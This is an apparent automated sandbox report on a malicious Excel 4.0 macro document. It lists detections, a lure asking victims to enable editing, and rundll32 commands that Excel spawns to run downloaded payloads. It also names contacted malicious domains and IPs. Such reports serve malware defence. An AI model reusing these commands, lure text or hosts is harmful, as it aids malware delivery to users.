Windows Analysis Report statistic-1496367785.xls

Overview

General Information

Sample Name: statistic-1496367785.xls
Analysis ID: 441923
MD5: 7fb48e03b899f792be6c3118a46c5c8f
SHA1: 55445d13cd433121c6c2bfb31414b08e31e28a65
SHA256: 1c818433e1ca49729f987b3f060b2133c8375f8164181c4684600a278ee6033f

Detection

Hidden Macro 4.0
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara detected Xls With Macro 4.0

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 5304 cmdline: rundll32 ..\flamo.vir,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5428 cmdline: rundll32 ..\flamo.vir1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
statistic-1496367785.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
statistic-1496367785.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\flamo.vir,DllRegisterServer, CommandLine: rundll32 ..\flamo.vir,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6844, ProcessCommandLine: rundll32 ..\flamo.vir,DllRegisterServer, ProcessId: 5304

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: statistic-1496367785.xls, Virustotal: Detection: 37%
Source: statistic-1496367785.xls, ReversingLabs: Detection: 34%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 162.241.2.112:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 108.179.232.80:443 -> 192.168.2.4:49736 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\rundll32.exe
Source: global traffic, DNS query: name: psq.com.mx
Source: global traffic, TCP traffic: 192.168.2.4:49734 -> 162.241.2.112:443
Source: Joe Sandbox View, IP Address: 108.179.232.80
Source: Joe Sandbox View, IP Address: 162.241.2.112
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, DNS traffic detected: queries for: psq.com.mx
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
      Source: unknown, HTTPS traffic detected: 162.241.2.112:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 108.179.232.80:443 -> 192.168.2.4:49736 version: TLS 1.2

      System Summary:

      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
      Source: Screenshot number: 4, Screenshot OCR: Enable Editing 11 from the yellow bar above RunDLL X 12 13 Once You have Enable Editing, plea T
      Source: Screenshot number: 8, Screenshot OCR: Enable Editing I, 11 from the yellow bar above RunDLL (Not Responding) t 12 , It 13 Once Yo
      Found Excel 4.0 Macro with suspicious formulas
      Source: statistic-1496367785.xls, Initial sample: CALL
      Source: statistic-1496367785.xls, Initial sample: EXEC
      Found abnormal large hidden Excel 4.0 Macro sheet
      Source: statistic-1496367785.xls, Initial sample: Sheet size: 8121
      Source: classification engine, Classification label: mal80.expl.evad.winXLS@5/7@2/2
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\{698BFA13-D49C-4C62-9BE6-E187F6452013} - OProcSessId.dat
      Source: statistic-1496367785.xls, OLE indicator, Workbook stream: true
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File read: C:\Users\desktop.ini
      Source: C:\Windows\SysWOW64\rundll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer
      Source: statistic-1496367785.xls, Virustotal: Detection: 37%
      Source: statistic-1496367785.xls, ReversingLabs: Detection: 34%
      Source: unknown, Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\flamo.vir1,DllRegisterServer
      Source: C:\Windows\SysWOW64\rundll32.exe, Automated click: OK
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: statistic-1496367785.xls, Initial sample: OLE indicators vbamacros = False
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX
      Source: rundll32.exe, 0000000F.00000002.920391861.0000000003F10000.00000002.00000001.sdmp, Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: rundll32.exe, 0000000F.00000002.920391861.0000000003F10000.00000002.00000001.sdmp, Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: rundll32.exe, 0000000F.00000002.920391861.0000000003F10000.00000002.00000001.sdmp, Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: rundll32.exe, 0000000F.00000002.920391861.0000000003F10000.00000002.00000001.sdmp, Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

      HIPS / PFW / Operating System Protection Evasion:

      Yara detected hidden Macro 4.0 in Excel
      Source: Yara match, File source: statistic-1496367785.xls, type: SAMPLE

      Mitre Att&ck Matrix

      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
      | Valid Accounts | Scripting 2 | Path Interception | Process Injection 1 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
      | Default Accounts | Exploitation for Client Execution 23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
      | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll32 1 | Security Account Manager | System Information Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
      | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
      | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 2 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | statistic-1496367785.xls | 38% | Virustotal | | Browse |
      | statistic-1496367785.xls | 35% | ReversingLabs | Document-Excel.Trojan.Woreflint | |

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | academy.haleemcampus.com | 1% | Virustotal | | Browse |
      | psq.com.mx | 1% | Virustotal | | Browse |

      URLs


      Domains and IPs

      Contacted Domains

      Name                      IP              Active  Malicious  Antivirus Detection  Reputation
      academy.haleemcampus.com  108.179.232.80  true    false                           unknown
      psq.com.mx                162.241.2.112   true    false                           unknown

      URLs from Memory and Binaries

                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.ai0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devices0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://login.windows-ppe.net/common/oauth2/authorize0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://staging.cortana.ai0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown

                                                                                                                                                      Contacted IPs


                                                                                                                                                      Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 108.179.232.80 | academy.haleemcampus.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
| 162.241.2.112 | psq.com.mx | United States | 26337 | OIS1US | false |

                                                                                                                                                      General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 441923
Start date: 29.06.2021
Start time: 17:46:18
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 32s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: statistic-1496367785.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.expl.evad.winXLS@5/7@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
Warnings:
                                                                                                                                                      • Max analysis timeout: 220s exceeded, the analysis took too long
                                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 104.42.151.234, 40.88.32.150, 13.88.21.125, 52.109.76.68, 52.109.88.38, 93.184.220.29, 204.79.197.200, 13.107.21.200, 20.50.102.62, 20.54.7.98, 40.112.88.60, 93.184.221.240, 13.107.4.50, 80.67.82.235, 80.67.82.211
                                                                                                                                                      • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, cs9.wac.phicdn.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, afdap.au.au-msedge.net, ris.api.iris.microsoft.com, au.au-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

| Match | Associated Sample Name / URL | Detection |
|---|---|---|
| 108.179.232.80 | statistic-1496367785.xls | malicious |
| | 33c179ca_by_Libranalysis.xls | malicious |
| | 7fb953aa_by_Libranalysis.xls | malicious |
| | statistic-462462953.xls | malicious |
| | statistic-1403316517.xls | malicious |
| | statistic-260077031.xls | malicious |
| | 5c89f585_by_Libranalysis.xls | malicious |
| | statistic-1066846651.xls | malicious |
| 162.241.2.112 | statistic-1496367785.xls | malicious |
| | 33c179ca_by_Libranalysis.xls | malicious |
| | 7fb953aa_by_Libranalysis.xls | malicious |
| | statistic-462462953.xls | malicious |
| | statistic-1403316517.xls | malicious |
| | statistic-260077031.xls | malicious |
| | 5c89f585_by_Libranalysis.xls | malicious |
| | statistic-1066846651.xls | malicious |

                                                                                                                                                                                                                  Domains

